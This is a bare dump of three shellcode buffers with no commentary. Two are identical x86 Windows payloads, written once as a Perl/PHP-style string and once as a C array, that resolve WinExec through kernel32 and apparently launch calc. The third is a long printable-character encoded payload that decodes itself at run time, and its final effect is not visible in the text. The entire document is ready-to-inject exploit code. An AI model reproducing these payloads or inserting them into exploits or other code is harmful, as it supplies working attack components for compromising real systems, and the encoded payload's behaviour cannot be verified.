

$shellcode = 
"\x60\x33\xc0\x50\x68\x63\x61\x6c\x63\x50\x68\x78\x65\x63\x3f\x88".
"\x44\x24\x03\x68\x57\x69\x6e\x45\x50\x68\x65\x6c\x33\x32\x68\x6b".
"\x65\x72\x6e\x64\x8b\x50\x30\x8b\x52\x0c\x83\xc2\x1c\x8b\xc2\x33".
"\xc9\x8b\x14\x0a\x3b\xc2\x74\x6d\x8b\x72\x20\x8b\xfc\xb1\x08\x8a".
"\x44\x4e\xfe\x8a\x5c\x0f\xff\xfe\xc9\x3a\xc3\x74\xf2\x80\xf9\xff".
"\x75\xdd\x8b\x42\x08\x8b\x52\x08\x03\x40\x3c\x8b\x40\x78\x03\xc2".
"\x8b\x58\x20\x13\xda\x8b\x48\x18\x8b\x3b\x03\xfa\x8d\x74\x24\x0c".
"\x51\xb1\x08\xf3\xa6\x84\xc9\x59\x74\x07\x83\xc3\x04\xe2\xe9\xeb".
"\x24\x2b\xda\x2b\x58\x20\xd1\xeb\x03\x58\x24\x03\xda\x0f\xb7\x0b".
"\xc1\xe1\x02\x03\x48\x1c\x03\xca\x8b\x09\x03\xca\x8d\x5c\x24\x18".
"\x6a\x01\x53\xff\xd1\x83\xc4\x20\x61\xc3";



char shellcode[]=
"\x60\x33\xc0\x50\x68\x63\x61\x6c\x63\x50\x68\x78\x65\x63\x3f\x88"
"\x44\x24\x03\x68\x57\x69\x6e\x45\x50\x68\x65\x6c\x33\x32\x68\x6b"
"\x65\x72\x6e\x64\x8b\x50\x30\x8b\x52\x0c\x83\xc2\x1c\x8b\xc2\x33"
"\xc9\x8b\x14\x0a\x3b\xc2\x74\x6d\x8b\x72\x20\x8b\xfc\xb1\x08\x8a"
"\x44\x4e\xfe\x8a\x5c\x0f\xff\xfe\xc9\x3a\xc3\x74\xf2\x80\xf9\xff"
"\x75\xdd\x8b\x42\x08\x8b\x52\x08\x03\x40\x3c\x8b\x40\x78\x03\xc2"
"\x8b\x58\x20\x13\xda\x8b\x48\x18\x8b\x3b\x03\xfa\x8d\x74\x24\x0c"
"\x51\xb1\x08\xf3\xa6\x84\xc9\x59\x74\x07\x83\xc3\x04\xe2\xe9\xeb"
"\x24\x2b\xda\x2b\x58\x20\xd1\xeb\x03\x58\x24\x03\xda\x0f\xb7\x0b"
"\xc1\xe1\x02\x03\x48\x1c\x03\xca\x8b\x09\x03\xca\x8d\x5c\x24\x18"
"\x6a\x01\x53\xff\xd1\x83\xc4\x20\x61\xc3";


char shellcode[] = \
"\x54\x58\x2d\x41\x5a\x58\x5d\x2d\x3b\x54\x4c\x49\x2d\x3d\x4e\x5b"
"\x59\x50\x5c\x25\x47\x47\x4a\x2a\x25\x28\x28\x21\x40\x2d\x3b\x6f"
"\x25\x26\x2d\x33\x65\x24\x23\x2d\x31\x68\x25\x26\x50\x2d\x30\x6a"
"\x45\x27\x2d\x2c\x6a\x42\x24\x2d\x34\x6b\x44\x24\x50\x2d\x22\x2e"
"\x27\x64\x2d\x22\x2b\x25\x59\x2d\x23\x29\x25\x64\x50\x2d\x4a\x3d"
"\x6e\x4d\x2d\x49\x30\x61\x3f\x2d\x4a\x37\x5f\x5a\x50\x2d\x66\x70"
"\x60\x71\x2d\x56\x6e\x5f\x6f\x2d\x46\x74\x61\x6d\x50\x2d\x6e\x4f"
"\x5c\x58\x2d\x6a\x4d\x49\x54\x2d\x6b\x50\x5a\x53\x50\x2d\x2e\x68"
"\x56\x4d\x2d\x2c\x68\x4c\x3b\x2d\x2d\x6a\x5d\x3e\x50\x2d\x75\x6e"
"\x26\x7b\x2d\x72\x63\x25\x7c\x50\x2d\x4b\x41\x31\x59\x2d\x40\x3b"
"\x30\x57\x2d\x4c\x3b\x31\x58\x50\x2d\x39\x6a\x73\x63\x2d\x37\x64"
"\x6e\x5a\x2d\x3b\x69\x71\x59\x50\x2d\x66\x52\x68\x41\x2d\x66\x50"
"\x49\x3c\x2d\x68\x52\x45\x42\x50\x2d\x69\x72\x5a\x6a\x2d\x58\x6b"
"\x49\x66\x2d\x5f\x6b\x4c\x6f\x50\x2d\x30\x49\x22\x63\x2d\x2d\x48"
"\x22\x62\x2d\x33\x49\x22\x63\x50\x2d\x68\x44\x5d\x3a\x2d\x66\x3e"
"\x5c\x2f\x50\x2d\x2c\x6b\x60\x39\x2d\x29\x68\x60\x2d\x50\x2d\x44"
"\x6c\x51\x52\x2d\x40\x67\x4a\x4a\x2d\x40\x69\x48\x4a\x50\x2d\x56"
"\x6b\x62\x60\x2d\x44\x5e\x5f\x4e\x2d\x68\x6f\x5f\x63\x50\x2d\x5d"
"\x62\x5d\x71\x2d\x54\x4d\x5d\x70\x50\x2d\x73\x66\x62\x56\x2d\x6c"
"\x60\x60\x53\x2d\x70\x6c\x65\x5b\x50\x2d\x6f\x4a\x65\x74\x2d\x6c"
"\x3e\x5c\x70\x2d\x70\x57\x5b\x6c\x50\x2d\x69\x67\x47\x6b\x2d\x69"
"\x67\x34\x64\x2d\x6b\x69\x4b\x67\x50\x2d\x7d\x5a\x74\x46\x2d\x7e"
"\x5a\x75\x3c\x50\x2d\x4f\x59\x63\x6d\x2d\x44\x54\x63\x58\x50\x2d"
"\x48\x31\x4f\x21\x2d\x3b\x2b\x43\x21\x50\x2d\x64\x6e\x6d\x31\x2d"
"\x62\x68\x61\x2e\x2d\x63\x6f\x67\x2b\x50\x2d\x24\x66\x41\x2a\x2d"
"\x23\x61\x3b\x27\x2d\x26\x64\x47\x24\x50\x2d\x5d\x43\x5c\x26\x2d"
"\x56\x34\x54\x26\x2d\x65\x49\x50\x27\x50\x2d\x71\x3c\x52\x55\x2d"
"\x6c\x2f\x4f\x4d\x2d\x6b\x30\x54\x5e\x50\x2d\x27\x70\x53\x58\x2d"
"\x24\x68\x46\x46\x2d\x26\x67\x4e\x60\x50\x2d\x73\x3f\x3a\x60\x2d"
"\x6f\x31\x39\x58\x2d\x6e\x3f\x38\x65\x50\x2d\x72\x36\x60\x63\x50"
"\x2d\x39\x64\x70\x4d\x2d\x35\x53\x70\x45\x2d\x3f\x49\x71\x43\x50"
"\x2d\x50\x2b\x6d\x26\x2d\x42\x2a\x69\x25\x2d\x38\x29\x69\x25\x50"
"\x2d\x48\x45\x73\x68\x2d\x3f\x39\x6c\x64\x2d\x40\x3d\x73\x6a\x50"
"\x2d\x63\x4b\x48\x68\x2d\x59\x42\x3b\x5e\x2d\x6a\x50\x3e\x60\x50"
"\x2d\x68\x6a\x5d\x52\x2d\x66\x66\x57\x4f\x2d\x64\x6f\x51\x57\x50"
"\x2d\x4b\x44\x68\x57\x2d\x43\x42\x4e\x52\x2d\x55\x43\x4c\x55\x50"
"\x2d\x5b\x57\x56\x6e\x2d\x50\x52\x52\x62\x2d\x4e\x55\x4e\x56\x50"
"\x2d\x63\x6d\x24\x50\x2d\x58\x6c\x23\x49\x2d\x58\x6b\x23\x44\x50"
"\x2d\x70\x6f\x61\x70\x2d\x6f\x51\x62\x6f\x50\x2d\x65\x62\x47\x5a"
"\x2d\x56\x5a\x46\x59\x2d\x47\x56\x49\x5c\x50\x2d\x5b\x53\x5a\x5b"
"\x2d\x53\x4b\x57\x4d\x2d\x4d\x4e\x55\x63\x50\x2d\x5f\x65\x35\x64"
"\x2d\x52\x64\x35\x54\x2d\x57\x66\x36\x63\x50";